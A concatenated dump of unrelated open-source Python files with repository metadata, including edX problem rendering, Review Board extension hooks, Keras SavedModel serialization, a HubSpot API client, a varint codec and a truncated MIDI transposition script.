slug=self.problem_id,
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
log.exception("Error while execing script code: " + all_code)
msg = "Error while executing script code: %s" % str(err).replace('<', '<')
raise responsetypes.LoncapaProblemError(msg)
# Store code source in context, along with the Python path needed to run it correctly.
context['script_code'] = all_code
context['python_path'] = python_path
context['extra_files'] = extra_files or None
return context
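    # Hedged illustration (not part of the original file): a <script> block of
    # the kind _extract_context() executes. Variables it defines (here a
    # hypothetical ``computed_answer``) become available to response types such
    # as customresponse through the returned context.
    #
    #   <script type="loncapa/python">
    #   import random
    #   x = random.randint(2, 9)
    #   computed_answer = x * 2
    #   </script>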
def _extract_html(self, problemtree): # private
"""
Main (private) function which converts Problem XML tree to HTML.
Calls itself recursively.
Returns Element tree of XHTML representation of problemtree.
Calls render_html of Response instances to render responses into XHTML.
Used by get_html.
"""
if not isinstance(problemtree.tag, basestring):
# Comment and ProcessingInstruction nodes are not Elements,
# and we're ok leaving those behind.
# BTW: etree gives us no good way to distinguish these things
# other than to examine .tag to see if it's a string. :(
return
if (problemtree.tag == 'script' and problemtree.get('type')
and 'javascript' in problemtree.get('type')):
# leave javascript intact.
return deepcopy(problemtree)
if problemtree.tag in html_problem_semantics:
return
problemid = problemtree.get('id') # my ID
if problemtree.tag in inputtypes.registry.registered_tags():
# If this is an inputtype subtree, let it render itself.
status = "unsubmitted"
msg = ''
hint = ''
hintmode = None
input_id = problemtree.get('id')
answervariable = None
if problemid in self.correct_map:
pid = input_id
status = self.correct_map.get_correctness(pid)
msg = self.correct_map.get_msg(pid)
hint = self.correct_map.get_hint(pid)
hintmode = self.correct_map.get_hintmode(pid)
answervariable = self.correct_map.get_property(pid, 'answervariable')
value = ""
if self.student_answers and problemid in self.student_answers:
value = self.student_answers[problemid]
if input_id not in self.input_state:
self.input_state[input_id] = {}
# do the rendering
state = {
'value': value,
'status': status,
'id': input_id,
'input_state': self.input_state[input_id],
'answervariable': answervariable,
'feedback': {
'message': msg,
'hint': hint,
'hintmode': hintmode,
}
}
input_type_cls = inputtypes.registry.get_class_for_tag(problemtree.tag)
# save the input type so that we can make ajax calls on it if we need to
self.inputs[input_id] = input_type_cls(self.capa_system, problemtree, state)
return self.inputs[input_id].get_html()
# let each Response render itself
if problemtree in self.responders:
overall_msg = self.correct_map.get_overall_message()
return self.responders[problemtree].render_html(
self._extract_html, response_msg=overall_msg
)
# let each custom renderer render itself:
if problemtree.tag in customrender.registry.registered_tags():
renderer_class = customrender.registry.get_class_for_tag(problemtree.tag)
renderer = renderer_class(self.capa_system, problemtree)
return renderer.get_html()
# otherwise, render children recursively, and copy over attributes
tree = etree.Element(problemtree.tag)
for item in problemtree:
item_xhtml = self._extract_html(item)
if item_xhtml is not None:
tree.append(item_xhtml)
if tree.tag in html_transforms:
tree.tag = html_transforms[problemtree.tag]['tag']
else:
            # copy attributes over if the tag is not being made innocuous
for (key, value) in problemtree.items():
tree.set(key, value)
tree.text = problemtree.text
tree.tail = problemtree.tail
return tree
def _preprocess_problem(self, tree): # private
"""
Assign IDs to all the responses
Assign sub-IDs to all entries (textline, schematic, etc.)
        Annotate correctness and value
In-place transformation
Also create capa Response instances for each responsetype and save as self.responders
Obtain all responder answers and save as self.responder_answers dict (key = response)
"""
response_id = 1
self.responders = {}
for response in tree.xpath('//' + "|//".join(responsetypes.registry.registered_tags())):
response_id_str = self.problem_id + "_" + str(response_id)
# create and save ID for this response
response.set('id', response_id_str)
response_id += 1
answer_id = 1
input_tags = inputtypes.registry.registered_tags()
inputfields = tree.xpath(
"|".join(['//' + response.tag + '[@id=$id]//' + x for x in input_tags + solution_tags]),
id=response_id_str
)
# assign one answer_id for each input type or solution type
for entry in inputfields:
entry.attrib['response_id'] = str(response_id)
entry.attrib['answer_id'] = str(answer_id)
entry.attrib['id'] = "%s_%i_%i" % (self.problem_id, response_id, answer_id)
answer_id = answer_id + 1
# instantiate capa Response
responsetype_cls = responsetypes.registry.get_class_for_tag(response.tag)
responder = responsetype_cls(response, inputfields, self.context, self.capa_system, self.capa_module)
# save in list in self
self.responders[response] = responder
# get responder answers (do this only once, since there may be a performance cost,
# eg with externalresponse)
self.responder_answers = {}
for response in self.responders.keys():
try:
self.responder_answers[response] = self.responders[response].get_answers()
except:
log.debug('responder %s failed to properly return get_answers()',
self.responders[response]) # FIXME
raise
# <solution>...</solution> may not be associated with any specific response; give
# IDs for those separately
# TODO: We should make the namespaces consistent and unique (e.g. %s_problem_%i).
solution_id = 1
for solution in tree.findall('.//solution'):
solution.attrib['id'] = "%s_solution_%i" % (self.problem_id, solution_id)
solution_id += 1
|
tiagochiavericosta/edx-platform
|
common/lib/capa/capa/capa_problem.py
|
Python
|
agpl-3.0
| 36,583
|
import sys
import inspect
from functools import wraps
import six
class Prepareable(type):
if not six.PY3:
def __new__(cls, name, bases, attributes):
try:
constructor = attributes["__new__"]
except KeyError:
return type.__new__(cls, name, bases, attributes)
def preparing_constructor(cls, name, bases, attributes):
try:
cls.__prepare__
except AttributeError:
return constructor(cls, name, bases, attributes)
namespace = cls.__prepare__.__func__(name, bases)
defining_frame = sys._getframe(1)
get_index = None
for constant in reversed(defining_frame.f_code.co_consts):
if inspect.iscode(constant) and constant.co_name == name:
def _get_index(attribute_name, _names=constant.co_names):
try:
return _names.index(attribute_name)
except ValueError:
return 0
get_index = _get_index
break
if get_index is None:
return constructor(cls, name, bases, attributes)
by_appearance = sorted(
attributes.items(), key=lambda item: get_index(item[0])
)
for key, value in by_appearance:
namespace[key] = value
return constructor(cls, name, bases, namespace)
attributes["__new__"] = wraps(constructor)(preparing_constructor)
return type.__new__(cls, name, bases, attributes)
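# Hedged usage sketch (kept as comments; not part of the original module).
# Prepareable is the metaclass *of a metaclass*: it gives that metaclass a
# working __prepare__ under Python 2 by rebuilding the class body namespace in
# definition order from the defining frame. A hypothetical metaclass that
# records field order might look like this; note that __prepare__ is written
# without a cls argument, matching the ``cls.__prepare__.__func__(name, bases)``
# call in the shim above, and that the Python 2 path expects classes to be
# created by an ordinary ``class`` statement so the defining frame can be
# inspected.
#
#     import collections
#
#     class OrderedMeta(six.with_metaclass(Prepareable, type)):
#         def __prepare__(name, bases):
#             return collections.OrderedDict()
#
#         def __new__(mcs, name, bases, attributes):
#             new_cls = type.__new__(mcs, name, bases, dict(attributes))
#             new_cls.field_order = list(attributes)  # definition order
#             return new_cls
#
# Classes using OrderedMeta as their metaclass then expose ``field_order`` in
# the order their attributes were written, on both Python 2 and Python 3.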
|
lodevil/javaobject
|
javaobject/java/prepareable.py
|
Python
|
bsd-3-clause
| 1,749
|
from __future__ import unicode_literals
from django.utils import six
from djblets.extensions.hooks import (DataGridColumnsHook, ExtensionHook,
ExtensionHookPoint, SignalHook,
TemplateHook, URLHook)
from reviewboard.accounts.backends import (register_auth_backend,
unregister_auth_backend)
from reviewboard.accounts.pages import (get_page_class,
register_account_page_class,
unregister_account_page_class)
from reviewboard.admin.widgets import (register_admin_widget,
unregister_admin_widget)
from reviewboard.attachments.mimetypes import (register_mimetype_handler,
unregister_mimetype_handler)
from reviewboard.datagrids.grids import (DashboardDataGrid,
UserPageReviewRequestDataGrid)
from reviewboard.hostingsvcs.service import (register_hosting_service,
unregister_hosting_service)
from reviewboard.reviews.fields import (get_review_request_fieldset,
register_review_request_fieldset,
unregister_review_request_fieldset)
from reviewboard.reviews.ui.base import register_ui, unregister_ui
from reviewboard.webapi.server_info import (register_webapi_capabilities,
unregister_webapi_capabilities)
@six.add_metaclass(ExtensionHookPoint)
class AuthBackendHook(ExtensionHook):
"""A hook for registering an authentication backend.
    Authentication backends control user authentication, registration,
    user lookup, and user data manipulation.
This hook takes the class of an authentication backend that should
be made available to the server.
"""
def __init__(self, extension, backend_cls):
super(AuthBackendHook, self).__init__(extension)
self.backend_cls = backend_cls
register_auth_backend(backend_cls)
def shutdown(self):
super(AuthBackendHook, self).shutdown()
unregister_auth_backend(self.backend_cls)
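# Hedged usage sketch (kept as comments; not part of the original module): an
# extension registering a custom authentication backend through
# AuthBackendHook. The extension and backend classes are hypothetical.
#
#     from reviewboard.accounts.backends import AuthBackend
#     from reviewboard.extensions.base import Extension
#
#     class MyAuthBackend(AuthBackend):
#         backend_id = 'my-auth'
#         name = 'My Auth'
#
#     class MyExtension(Extension):
#         def initialize(self):
#             AuthBackendHook(self, MyAuthBackend)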
@six.add_metaclass(ExtensionHookPoint)
class AccountPagesHook(ExtensionHook):
"""A hook for adding new pages to the My Account page.
A page can contain one or more forms or even a custom template allowing
for configuration of an extension.
This takes a list of AccountPage classes as parameters, which it will
later instantiate as necessary. Each page can be pre-populated with
one or more custom AccountPageForm classes.
"""
def __init__(self, extension, page_classes):
super(AccountPagesHook, self).__init__(extension)
self.page_classes = page_classes
for page_class in page_classes:
register_account_page_class(page_class)
def shutdown(self):
super(AccountPagesHook, self).shutdown()
for page_class in self.page_classes:
unregister_account_page_class(page_class)
@six.add_metaclass(ExtensionHookPoint)
class AccountPageFormsHook(ExtensionHook):
"""A hook for adding new forms to a page in the My Account page.
This is used to add custom forms to a page in the My Account page. The
form can be used to provide user-level customization of an extension,
through a traditional form-based approach or even through custom
JavaScript.
This hook takes the ID of a registered page where the form should be
placed. Review Board supplies the following built-in page IDs:
* ``settings``
* ``authentication``
* ``profile``
* ``groups``
Any registered page ID can be provided, whether from this extension
or another.
Form classes can only be added to a single page.
"""
def __init__(self, extension, page_id, form_classes):
super(AccountPageFormsHook, self).__init__(extension)
self.page_id = page_id
self.form_classes = form_classes
page_class = get_page_class(page_id)
for form_class in form_classes:
page_class.add_form(form_class)
def shutdown(self):
super(AccountPageFormsHook, self).shutdown()
page_class = get_page_class(self.page_id)
for form_class in self.form_classes:
page_class.remove_form(form_class)
@six.add_metaclass(ExtensionHookPoint)
class AdminWidgetHook(ExtensionHook):
"""A hook for adding a new widget to the admin screen.
By default the new widget is added as a small widget in the right column
of the admin page. To instead add the new widget as a large widget in the
center of the admin page, pass in True for ``primary``.
"""
def __init__(self, extension, widget_cls, primary=False):
super(AdminWidgetHook, self).__init__(extension)
self.widget_cls = widget_cls
register_admin_widget(widget_cls, primary)
def shutdown(self):
super(AdminWidgetHook, self).shutdown()
unregister_admin_widget(self.widget_cls)
@six.add_metaclass(ExtensionHookPoint)
class DataGridSidebarItemsHook(ExtensionHook):
"""A hook for adding items to the sidebar of a datagrid.
Extensions can use this hook to plug new items into the sidebar of
any datagrid supporting sidebars.
The items can be any subclass of
:py:class:`reviewboard.datagrids.sidebar.BaseSidebarItem`, including the
built-in :py:class:`reviewboard.datagrids.sidebar.BaseSidebarSection` and
built-in :py:class:`reviewboard.datagrids.sidebar.SidebarNavItem`.
"""
def __init__(self, extension, datagrid, item_classes):
super(DataGridSidebarItemsHook, self).__init__(extension)
if not hasattr(datagrid, 'sidebar'):
raise ValueError('The datagrid provided does not have a sidebar')
self.datagrid = datagrid
self.item_classes = item_classes
for item in item_classes:
datagrid.sidebar.add_item(item)
def shutdown(self):
super(DataGridSidebarItemsHook, self).shutdown()
for item in self.item_classes:
self.datagrid.sidebar.remove_item(item)
# We don't use the ExtensionHookPoint metaclass here, because we actually
# want these to register in the base DataGridColumnsHook point.
class DashboardColumnsHook(DataGridColumnsHook):
"""A hook for adding custom columns to the dashboard.
Extensions can use this hook to provide one or more custom columns
in the dashboard. These columns can be added by users, moved around,
and even sorted, like other columns.
Each value passed to ``columns`` must be an instance of
:py:class:`djblets.datagrid.grids.Column`.
It also must have an ``id`` attribute set. This must be unique within
the dashboard. It is recommended to use a vendor-specific prefix to the
ID, in order to avoid conflicts.
"""
def __init__(self, extension, columns):
super(DashboardColumnsHook, self).__init__(
extension, DashboardDataGrid, columns)
@six.add_metaclass(ExtensionHookPoint)
class DashboardSidebarItemsHook(DataGridSidebarItemsHook):
"""A hook for adding items to the sidebar of the dashboard.
Extensions can use this hook to plug new items into the sidebar of
the dashboard. These will appear below the built-in items.
The items can be any subclass of
:py:class:`reviewboard.datagrids.sidebar.BaseSidebarItem`, including the
built-in :py:class:`reviewboard.datagrids.sidebar.BaseSidebarSection` and
built-in :py:class:`reviewboard.datagrids.sidebar.SidebarNavItem`.
"""
def __init__(self, extension, item_classes):
super(DashboardSidebarItemsHook, self).__init__(
extension, DashboardDataGrid, item_classes)
@six.add_metaclass(ExtensionHookPoint)
class HostingServiceHook(ExtensionHook):
"""A hook for registering a hosting service."""
def __init__(self, extension, service_cls):
super(HostingServiceHook, self).__init__(extension)
self.name = service_cls.name
register_hosting_service(service_cls.name, service_cls)
def shutdown(self):
super(HostingServiceHook, self).shutdown()
unregister_hosting_service(self.name)
@six.add_metaclass(ExtensionHookPoint)
class NavigationBarHook(ExtensionHook):
"""A hook for adding entries to the main navigation bar.
This takes a list of entries. Each entry represents something
on the navigation bar, and is a dictionary with the following keys:
* ``label``: The label to display
* ``url``: The URL to point to.
* ``url_name``: The name of the URL to point to.
Only one of ``url`` or ``url_name`` is required. ``url_name`` will
take precedence.
Optionally, a callable can be passed in for ``is_enabled_for``, which takes
a single argument (the user) and returns True or False, indicating whether
the entries should be shown. If this is not passed in, the entries are
always shown (including for anonymous users).
If your hook needs to access the template context, it can override
get_entries and return results from there.
"""
    def __init__(self, extension, entries=[], is_enabled_for=None,
*args, **kwargs):
super(NavigationBarHook, self).__init__(extension, *args,
**kwargs)
self.entries = entries
self.is_enabled_for = is_enabled_for
def get_entries(self, context):
if (not callable(self.is_enabled_for) or
self.is_enabled_for(context.get('user', None))):
return self.entries
else:
return []
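# A minimal usage sketch (not part of the original module), assuming a
# Review Board Extension subclass; hooks are normally instantiated in the
# extension's initialize(). The extension class and URL name below are
# hypothetical, and the import path is assumed.
#
#     from reviewboard.extensions.base import Extension
#
#     class SampleExtension(Extension):
#         def initialize(self):
#             NavigationBarHook(self, entries=[{
#                 'label': 'My Page',
#                 'url_name': 'my-page-url',  # hypothetical URL name
#             }])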
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestApprovalHook(ExtensionHook):
"""A hook for determining if a review request is approved.
Extensions can use this to hook into the process for determining
review request approval, which may impact any scripts integrating
with Review Board to, for example, allow committing to a repository.
"""
def is_approved(self, review_request, prev_approved, prev_failure):
"""Determines if the review request is approved.
This function is provided with the review request and the previously
calculated approved state (either from a prior hook, or from the
base state of ``ship_it_count > 0 and issue_open_count == 0``).
If approved, this should return True. If unapproved, it should
return a tuple with False and a string briefly explaining why it's
not approved. This may be displayed to the user.
It generally should also take the previous approved state into
consideration in this choice (such as returning False if the previous
state is False). This is, however, fully up to the hook.
The approval decision may be overridden by any following hooks.
"""
raise NotImplementedError
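# A minimal illustration (not from the original module): a hypothetical
# subclass that keeps any earlier rejection and additionally requires two
# Ship It reviews. The ``shipit_count`` attribute is an assumption here.
#
#     class RequireTwoShipItsHook(ReviewRequestApprovalHook):
#         def is_approved(self, review_request, prev_approved, prev_failure):
#             if not prev_approved:
#                 return False, prev_failure
#             if review_request.shipit_count < 2:
#                 return False, 'At least two Ship Its are required.'
#             return True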
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestFieldSetsHook(ExtensionHook):
"""A hook for creating fieldsets on the side of the review request page.
A fieldset contains one or more fields, and is mainly used to separate
groups of fields from each other.
This takes a list of fieldset classes as parameters, which it will
later instantiate as necessary. Each fieldset can be pre-populated with
one or more custom field classes.
"""
def __init__(self, extension, fieldsets):
super(ReviewRequestFieldSetsHook, self).__init__(extension)
self.fieldsets = fieldsets
for fieldset in fieldsets:
register_review_request_fieldset(fieldset)
def shutdown(self):
super(ReviewRequestFieldSetsHook, self).shutdown()
for fieldset in self.fieldsets:
unregister_review_request_fieldset(fieldset)
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestFieldsHook(ExtensionHook):
"""A hook for creating fields on the review request page.
This is used to create custom fields on a review request page for
requesting and storing data. A field can be editable, or it can be only
for display purposes. See the classes in
:py:mod:`reviewboard.reviews.fields` for more information and
documentation.
This hook takes the ID of a registered fieldset where the provided
field classes should be added. Review Board supplies three built-in
fieldset IDs:
* ``main`` - The fieldset with Description and Testing Done.
* ``info`` - The "Information" fieldset on the side.
* ``reviewers`` - The "Reviewers" fieldset on the side.
Any registered fieldset ID can be provided, whether from this extension
or another.
Field classes can only be added to a single fieldset.
"""
def __init__(self, extension, fieldset_id, fields):
super(ReviewRequestFieldsHook, self).__init__(extension)
self.fieldset_id = fieldset_id
self.fields = fields
fieldset = get_review_request_fieldset(fieldset_id)
for field_cls in fields:
fieldset.add_field(field_cls)
def shutdown(self):
super(ReviewRequestFieldsHook, self).shutdown()
fieldset = get_review_request_fieldset(self.fieldset_id)
for field_cls in self.fields:
fieldset.remove_field(field_cls)
@six.add_metaclass(ExtensionHookPoint)
class WebAPICapabilitiesHook(ExtensionHook):
"""This hook allows adding capabilities to the web API server info.
Note that this does not add the functionality, but adds to the server
info listing.
"""
def __init__(self, extension, caps):
super(WebAPICapabilitiesHook, self).__init__(extension)
register_webapi_capabilities(extension.id, caps)
def shutdown(self):
super(WebAPICapabilitiesHook, self).shutdown()
unregister_webapi_capabilities(self.extension.id)
@six.add_metaclass(ExtensionHookPoint)
class CommentDetailDisplayHook(ExtensionHook):
"""This hook allows adding details to the display of comments.
The hook can provide additional details to display for a comment in a
review and e-mails.
"""
def render_review_comment_detail(self, comment):
raise NotImplementedError
def render_email_comment_detail(self, comment, is_html):
raise NotImplementedError
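# A minimal illustration (not from the original module): a hypothetical
# subclass that appends a fixed note to every rendered comment.
#
#     class NoteDetailHook(CommentDetailDisplayHook):
#         def render_review_comment_detail(self, comment):
#             return '<p>Checked by SampleExtension</p>'
#
#         def render_email_comment_detail(self, comment, is_html):
#             if is_html:
#                 return '<p>Checked by SampleExtension</p>'
#             return 'Checked by SampleExtension\n'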
@six.add_metaclass(ExtensionHookPoint)
class ReviewUIHook(ExtensionHook):
"""This hook allows integration of Extension-defined Review UIs.
This accepts a list of Review UIs specified by the Extension and
registers them when the hook is created. Likewise, it unregisters
the same list of Review UIs when the Extension is disabled.
"""
def __init__(self, extension, review_uis):
super(ReviewUIHook, self).__init__(extension)
self.review_uis = review_uis
for review_ui in self.review_uis:
register_ui(review_ui)
def shutdown(self):
super(ReviewUIHook, self).shutdown()
for review_ui in self.review_uis:
unregister_ui(review_ui)
@six.add_metaclass(ExtensionHookPoint)
class FileAttachmentThumbnailHook(ExtensionHook):
"""This hook allows custom thumbnails to be defined for file attachments.
This accepts a list of Mimetype Handlers specified by the Extension
that must:
* Subclass :py:class:`reviewboard.attachments.mimetypes.MimetypeHandler`
* Define a list of file mimetypes it can handle in a class variable
called `supported_mimetypes`
* Define how to generate a thumbnail of that mimetype by overriding
the instance function `def get_thumbnail(self):`
These MimetypeHandlers are registered when the hook is created. Likewise,
it unregisters the same list of MimetypeHandlers when the Extension is
disabled.
"""
def __init__(self, extension, mimetype_handlers):
super(FileAttachmentThumbnailHook, self).__init__(extension)
self.mimetype_handlers = mimetype_handlers
for mimetype_handler in self.mimetype_handlers:
register_mimetype_handler(mimetype_handler)
def shutdown(self):
super(FileAttachmentThumbnailHook, self).shutdown()
for mimetype_handler in self.mimetype_handlers:
unregister_mimetype_handler(mimetype_handler)
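# A minimal illustration (not from the original module): a hypothetical
# mimetype handler meeting the requirements listed in the docstring above.
# The ``self.attachment`` attribute and the thumbnail markup are assumptions.
#
#     from reviewboard.attachments.mimetypes import MimetypeHandler
#
#     class PlainTextThumbnailHandler(MimetypeHandler):
#         supported_mimetypes = ['text/plain']
#
#         def get_thumbnail(self):
#             return ('<pre class="file-thumbnail">%s</pre>'
#                     % self.attachment.filename)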
class ActionHook(ExtensionHook):
"""A hook for adding actions to a review request.
Actions are displayed somewhere on the action bar (alongside Reviews,
Close, etc.) of the review request. The subclasses of ActionHook should
be used to determine placement.
The provided actions parameter must be a list of actions. Each
action must be a dict with the following keys:
* ``id``: The ID of this action (optional).
* ``image``: The path to the image used for the icon (optional).
* ``image_width``: The width of the image (optional).
* ``image_height``: The height of the image (optional).
* ``label``: The label for the action.
* ``url``: The URI to invoke when the action is clicked.
If you want to invoke a javascript action, this should
be '#', and you should use a selector on the `id`
field to attach the handler (as opposed to a
javascript: URL, which doesn't work on all browsers).
If your hook needs to access the template context, it can override
get_actions and return results from there.
"""
def __init__(self, extension, actions=[], *args, **kwargs):
super(ActionHook, self).__init__(extension, *args, **kwargs)
self.actions = actions
def get_actions(self, context):
"""Returns the list of action information for this action."""
return self.actions
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestActionHook(ActionHook):
"""A hook for adding an action to the review request page."""
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestDropdownActionHook(ActionHook):
"""A hook for adding an drop down action to the review request page.
The actions for a drop down action should contain:
* ``id``: The ID of this action (optional).
* ``label``: The label of the drop-down.
* ``items``: A list of ActionHook-style dicts (see ActionHook params).
For example::
actions = [{
'id': 'id 0',
'label': 'Title',
'items': [
{
'id': 'id 1',
'label': 'Item 1',
'url': '...',
},
{
'id': 'id 2',
'label': 'Item 2',
'url': '...',
}
]
}]
"""
@six.add_metaclass(ExtensionHookPoint)
class DiffViewerActionHook(ActionHook):
"""A hook for adding an action to the diff viewer page."""
@six.add_metaclass(ExtensionHookPoint)
class HeaderActionHook(ActionHook):
"""A hook for putting an action in the page header."""
@six.add_metaclass(ExtensionHookPoint)
class HeaderDropdownActionHook(ActionHook):
"""A hook for putting multiple actions into a header dropdown."""
@six.add_metaclass(ExtensionHookPoint)
class UserPageSidebarItemsHook(DataGridSidebarItemsHook):
"""A hook for adding items to the sidebar of the user page.
Extensions can use this hook to plug new items into the sidebar of
the user page. These will appear below the built-in items.
The items can be any subclass of
:py:class:`reviewboard.datagrids.sidebar.BaseSidebarItem`, including the
built-in :py:class:`reviewboard.datagrids.sidebar.BaseSidebarSection` and
built-in :py:class:`reviewboard.datagrids.sidebar.SidebarNavItem`.
"""
def __init__(self, extension, item_classes):
super(UserPageSidebarItemsHook, self).__init__(
extension, UserPageReviewRequestDataGrid, item_classes)
__all__ = [
'AccountPageFormsHook',
'AccountPagesHook',
'ActionHook',
'AdminWidgetHook',
'AuthBackendHook',
'CommentDetailDisplayHook',
'DashboardColumnsHook',
'DashboardSidebarItemsHook',
'DataGridColumnsHook',
'DataGridSidebarItemsHook',
'DiffViewerActionHook',
'ExtensionHook',
'FileAttachmentThumbnailHook',
'HeaderActionHook',
'HeaderDropdownActionHook',
'HostingServiceHook',
'NavigationBarHook',
'ReviewRequestActionHook',
'ReviewRequestApprovalHook',
'ReviewRequestDropdownActionHook',
'ReviewRequestFieldSetsHook',
'ReviewRequestFieldsHook',
'ReviewUIHook',
'SignalHook',
'TemplateHook',
'URLHook',
'UserPageSidebarItemsHook',
'WebAPICapabilitiesHook',
]
|
custode/reviewboard
|
reviewboard/extensions/hooks.py
|
Python
|
mit
| 20,845
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions implementing to Model SavedModel serialization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.saving import saving_utils
from tensorflow.python.keras.saving.saved_model import constants
from tensorflow.python.keras.saving.saved_model import network_serialization
from tensorflow.python.keras.saving.saved_model import save_impl
class ModelSavedModelSaver(network_serialization.NetworkSavedModelSaver):
"""Model SavedModel serialization."""
@property
def object_identifier(self):
return '_tf_keras_model'
def _python_properties_internal(self):
metadata = super(ModelSavedModelSaver, self)._python_properties_internal()
metadata.update(
saving_utils.model_metadata(
self.obj, include_optimizer=True, require_config=False))
return metadata
def _get_serialized_attributes_internal(self, serialization_cache):
default_signature = None
# Create a default signature function if this is the only object in the
# cache (i.e. this is the root level object).
if len(serialization_cache[constants.KERAS_CACHE_KEY]) == 1:
default_signature = save_impl.default_save_signature(self.obj)
# Other than the default signature function, all other attributes match with
# the ones serialized by Layer.
objects, functions = (
super(ModelSavedModelSaver, self)._get_serialized_attributes_internal(
serialization_cache))
functions['_default_save_signature'] = default_signature
return objects, functions
class SequentialSavedModelSaver(ModelSavedModelSaver):
@property
def object_identifier(self):
return '_tf_keras_sequential'
|
chemelnucfin/tensorflow
|
tensorflow/python/keras/saving/saved_model/model_serialization.py
|
Python
|
apache-2.0
| 2,441
|
from base import BaseClient
NURTURING_API_VERSION = '1'
class NurturingClient(BaseClient):
def _get_path(self, subpath):
return 'nurture/v%s/%s' % (NURTURING_API_VERSION, subpath)
def get_campaigns(self, **options):
return self._call('campaigns', **options)
def get_leads(self, campaign_guid, **options):
return self._call('campaign/%s/list' % campaign_guid, **options)
def get_history(self, lead_guid, **options):
return self._call('lead/%s' % lead_guid, **options)
def enroll_lead(self, campaign_guid, lead_guid, **options):
return self._call('campaign/%s/add' % campaign_guid, data=lead_guid, method='POST', **options)
def unenroll_lead(self, campaign_guid, lead_guid, **options):
return self._call('campaign/%s/remove' % campaign_guid, data=lead_guid, method='POST', **options)
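# A minimal usage sketch (not part of the original module). It assumes
# BaseClient accepts an ``api_key`` keyword, as other hapipy clients do;
# the key and GUID below are placeholders.
#
#     client = NurturingClient(api_key='demo-key')
#     campaigns = client.get_campaigns()
#     leads = client.get_leads('campaign-guid')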
|
ack8006/hapipy
|
hapi/nurturing.py
|
Python
|
apache-2.0
| 890
|
# -*- coding: utf-8 -*-
#
# OpenCraft -- tools to aid developing and hosting free software projects
# Copyright (C) 2015-2019 OpenCraft <contact@opencraft.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Tests - Base Class & Utils
"""
# Imports #####################################################################
from rest_framework.test import APIClient, APIRequestFactory
from instance.tests.base import WithUserTestCase
# Tests #######################################################################
class APITestCase(WithUserTestCase):
"""
Base class for API tests
"""
def setUp(self):
super().setUp()
self.api_factory = APIRequestFactory()
self.api_client = APIClient()
|
open-craft/opencraft
|
instance/tests/api/base.py
|
Python
|
agpl-3.0
| 1,343
|
#!/usr/bin/env python3
# Copyright (c) 2011 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. It is provided for educational
# purposes and is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import unittest
import Atomic
class TestAtomic(unittest.TestCase):
def setUp(self):
self.original_list = list(range(10))
def test_list_succeed(self):
items = self.original_list[:]
with Atomic.Atomic(items) as atomic:
atomic.append(1999)
atomic.insert(2, -915)
del atomic[5]
atomic[4] = -782
atomic.insert(0, -9)
self.assertEqual(items,
[-9, 0, 1, -915, 2, -782, 5, 6, 7, 8, 9, 1999])
def test_list_fail(self):
def process():
nonlocal items
with Atomic.Atomic(items) as atomic:
atomic.append(1999)
atomic.insert(2, -915)
del atomic[5]
atomic[4] = -782
atomic.poop() # Typo
items = self.original_list[:]
self.assertRaises(AttributeError, process)
self.assertEqual(items, self.original_list)
if __name__ == "__main__":
unittest.main()
|
therealjumbo/python_summer
|
py31eg/test_Atomic.py
|
Python
|
gpl-3.0
| 1,613
|
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import os
import struct
import sys
def write_uvarint(w, val):
"""Writes a varint value to the supplied file-like object.
Args:
w (object): A file-like object to write to. Must implement write.
val (number): The value to write. Must be >= 0.
Returns (int): The number of bytes that were written.
Raises:
ValueError if 'val' is < 0.
"""
if val < 0:
raise ValueError('Cannot encode negative value, %d' % (val,))
count = 0
while val > 0 or count == 0:
byte = (val & 0b01111111)
val >>= 7
if val > 0:
byte |= 0b10000000
w.write(struct.pack('B', byte))
count += 1
return count
def read_uvarint(r):
"""Reads a uvarint from a stream.
This is targeted towards testing, and will not be used in production code.
Args:
r (object): A file-like object to read from. Must implement read.
Returns: (value, count)
value (int): The decoded varint number.
count (int): The number of bytes that were read from 'r'.
Raises:
ValueError if the encoded varint is not terminated.
"""
count = 0
result = 0
while True:
byte = r.read(1)
if len(byte) == 0:
raise ValueError('UVarint was not terminated')
byte = struct.unpack('B', byte)[0]
result |= ((byte & 0b01111111) << (7 * count))
count += 1
if byte & 0b10000000 == 0:
break
return result, count
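# A minimal round-trip sketch (not part of the original module), using an
# in-memory buffer:
#
#     import io
#
#     buf = io.BytesIO()
#     write_uvarint(buf, 300)              # encodes as 0xAC 0x02
#     buf.seek(0)
#     value, count = read_uvarint(buf)
#     assert (value, count) == (300, 2)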
|
chromium/chromium
|
third_party/logdog/logdog/varint.py
|
Python
|
bsd-3-clause
| 1,542
|
'''Simple program to show MIDI note number (key) transposition.'''
import midi_util
from midi_util import NoteTransposer
from pyportmidi import midi
if __name__ == '__main__':
midi.init()
TRANSPOSITION_MAP = {37: 47,
38: 48,
39: 49,
40: 50,
41: 51,
42: 52,
43: 53,
44: 54,
45: 55,
46: 56,
47: 57,
48: 58,
49: 59}
nanopad_transposer = NoteTransposer("nanoPAD2 PAD",
